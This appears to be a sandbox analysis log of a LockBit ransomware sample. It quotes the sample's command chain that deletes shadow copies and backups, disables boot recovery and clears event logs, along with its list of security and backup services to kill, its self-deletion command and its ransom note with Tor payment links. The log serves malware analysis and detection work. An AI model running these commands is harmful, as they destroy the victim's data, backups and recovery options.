                      Source: Lab5-3.exe, 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exe, 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exe, 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: Lab5-3.exe, 00000028.00000003.2036100405.0000000018018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33N
                      Source: Lab5-3.exe, 00000028.00000003.2389924852.000000001801D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33N
                      Source: Lab5-3.exe, 00000028.00000003.2003212823.0000000018018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33N
                      Source: Lab5-3.exe, 00000028.00000003.2279748730.0000000018018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33N
                      Source: Lab5-3.exe, 00000028.00000002.3228029792.000000001801E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33N
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: vssadmin.exe, 00000031.00000002.1918746185.0000015F74035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmindeleteshadows/all/quiet
                      Source: vssadmin.exe, 00000031.00000002.1918017383.0000015F73C70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet vssadmin delete shadows /all /quiet WinSta0\Defaultz
                      Source: vssadmin.exe, 00000031.00000002.1918017383.0000015F73C70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
                      Source: vssadmin.exe, 00000031.00000002.1918017383.0000015F73C70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet >
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: vssadmin.exe, 00000036.00000002.1937953563.0000016319C55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadminDeleteShadows/All/Quiet:/
                      Source: vssadmin.exe, 00000036.00000002.1921405026.00000163198F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quietvssadmin Delete Shadows /All /QuietWinSta0\DefaultD
                      Source: vssadmin.exe, 00000036.00000002.1921405026.00000163198F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: vssadmin.exe, 0000003F.00000002.1955248801.0000019D9BF40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quietvssadmin Delete Shadows /All /QuietWinSta0\Default
                      Source: vssadmin.exe, 0000003F.00000002.1955248801.0000019D9BF40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin Delete Shadows /All /Quiet
                      Source: vssadmin.exe, 0000003F.00000002.1955724025.0000019D9C285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadminDeleteShadows/All/Quiet
                      Source: Lab5-3.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: Lab5-3.exeBinary or memory string: /c vssadmin Delete Shadows /All /Quiet
                      Source: Lab5-3.exeBinary or memory string: For more information see Restore-My-Files.txt that is located in every encrypted folder08:15:1008:15:10GenuineIntelAuthenticAMDGlobal\{02B49784-1CA2-436C-BC08-72FA3956507D}Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}SeDebugPrivilegeDebug Privilege: OK08:15:10Local time: %d.%d %d:%dPC: %s08:15:12cmd.exeRemoved autorun key /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"SOFTWARE\Microsoft\Windows\CurrentVersion\RunXO1XADpO01"%s"Service %s stoppedwrapperDefWatchccEvtMgrccSetMgrSavRoamSqlservrsqlagentsqladhlpCulserverRTVscansqlbrowserSQLADHLPQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServicesqlwritermsmdsrvtomcat6zhudongfangyuvmware-usbarbitator64vmware-converterdbsrv12dbeng8MSSQL$MICROSOFT##WIDMSSQL$VEEAMSQL2012SQLAgent$VEEAMSQL2012SQLBrowserSQLWriterFishbowlMySQLMSSQL$MICROSOFT##WIDMySQL57MSSQL$KAV_CS_ADMIN_KITMSSQLServerADHelper100SQLAgent$KAV_CS_ADMIN_KITmsftesql-ExchangeMSSQL$MICROSOFT##SSEEMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTQBFCServiceQBVSSYooBackupYooITvsssqlsvc$MSSQLMSSQL$memtasmepocssophosveeambackupbedbgPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceMVArmorMVarmor64stc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcAcronisAgentARSMAcrSch2SvcCASAD2DWebSvcCAARCUpdateSvcWSBExchangeMSExchangeMSExchange$Service %s stoppedService %s stoppedService %s stoppedcmd.exerunas/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietwxServerwxServerViewsqlmangrRAguisuperviseCultureDefwatchwinwordQBW32QBDBMgrqbupdateaxlbridgehttpdfdlauncherMsDtSrvrjava360se360doctorwdswfsafefdhostGDscanZhuDongFangYuQBDBMgrNmysqldAutodeskDesktopAppacwebbrowserCreative CloudAdobe Desktop ServiceCoreSyncAdobe CEF HelpernodeAdobeIPCBrokersync-taskbarsync-workerInputPersonalizationAdobeCollabSyncBrCtrlCntrBrCcUxSysSimplyConnectionManagerSimply.SystemTrayIconfbguardfbserverONENOTEMwsa_servicekoaly-exp-engine-serviceTeamViewer_ServiceTeamViewertv_w32tv_x64TitanVSsmsnotepadRdrCEFsamoracleocssddbsnmpsynctimeagntsvcisqlplussvcxfssvcconmydesktopserviceocautoupdsencsvcfirefoxtbirdconfigmydesktopqosocommdbeng50sqbcoreserviceexcelinfopathmsaccessmspubonenoteoutlookpowerpntsteamthebatthunderbirdvisiowordpadbedbhvxmonbenetnsbengienpvlsvrbeserverraw_agent_svcvsnapvssCagServiceDellSystemDetectEnterpriseClientVeeamDeploymentSvcKilled process: %s [pid: %ld]Wow64DisableWow64FsRedirectionkernel32/c vssadmin Delete Shadows /All /Quiet/c bcdedit /set {default} recoveryenabled No/c bcdedit /set {default} bootstatuspolicy ignoreallfailures/c wbadmin DELETE SYSTEMSTATEBACKUP/c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest/c wmic SHADOWCOPY /nointeractive/c wevtutil c
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile moved: C:\Users\user\Desktop\FENIVHOIKN.pngJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile moved: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsxJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile moved: C:\Users\user\Desktop\AIXACVYBSB\XZXHAVGRAG.pdfJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile moved: C:\Users\user\Desktop\DTBZGIOOSO\ONBQCLYSPU.xlsxJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile moved: C:\Users\user\Desktop\UMMBDNEQBN.xlsxJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\css\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Restore-My-Files.txt -> decryptor.top/?bc76d224712a7481bc6e90acb6d18e50| 2. follow the instructions on this page2) through a tor browser - recommended| 1. download tor browser - https://www.torproject.org/ and install it.| 2. open link in tor browser - http://lockbitks2tvnmwk.onion/?bc76d224712a7481bc6e90acb6d18e50 this link only works in tor browser! | 3. follow the instructions on this page ### attention! ### # lockbit-decryptor.top may be blocked. we recommend using a tor browser to access the site # do not rename encrypted files. # do not try to decrypt using third party software, it may cause permanent data loss. # decryption of your files with the help of third parties may cause increased price(they add their fee to our). # tor browser may be blocked in your country or corporate network. use https://bridges.torproject.org or use tor browser over vpn. # tor browser user manual https://tb-manual.torproject.org/aboutJump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\home-view.css.lockbit entropy: 7.9950096704Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\Default\NTUSER.DAT.lockbit entropy: 7.99934634996Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\ui-strings.js.lockbit entropy: 7.99269970906Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\ui-strings.js.lockbit entropy: 7.99086170397Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\H3gIahXaXkGgvztu9ouLmJNXhQM.br[1].js.lockbit entropy: 7.99871607427Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\Init[1].htm.lockbit entropy: 7.99836364681Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\gYsYMd3hJLlkm0pWl7CInhg245Y.br[1].js.lockbit entropy: 7.99662074697Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\ui-strings.js.lockbit entropy: 7.99308386953Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\ui-strings.js.lockbit entropy: 7.99510062016Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\JClcsxanpxBiLGzKZtauWAccdA0.br[1].js.lockbit entropy: 7.99584101114Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js.lockbit entropy: 7.99628074542Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\onra7PQl9o5bYT2lASI1BE4DDEs[1].css.lockbit entropy: 7.99763747471Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\pwoaMbzGzgAZN6Xp7f9HbnqMX2U.br[1].js.lockbit entropy: 7.99927279987Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.lockbit entropy: 7.99820690345Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\ui-strings.js.lockbit entropy: 7.994711772Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js.lockbit entropy: 7.99789859785Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.lockbit entropy: 7.99846275704Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\uANxnX_BheDjd2-cdR8N9DEWlds[1].css.lockbit entropy: 7.99129968805Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\ui-strings.js.lockbit entropy: 7.99034593045Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\en-us\Q3_2022_GetWorkDoneFaster_New_Pro.webm.lockbit entropy: 7.9952200802Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\pt-br\NativeRS.webm.lockbit entropy: 7.99258029035Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\ui-strings.js.lockbit entropy: 7.99425235209Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\pt-br\Q3_2022_send-in-bulk.png.lockbit entropy: 7.99454103186Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\ui-strings.js.lockbit entropy: 7.99434506518Jump to dropped file
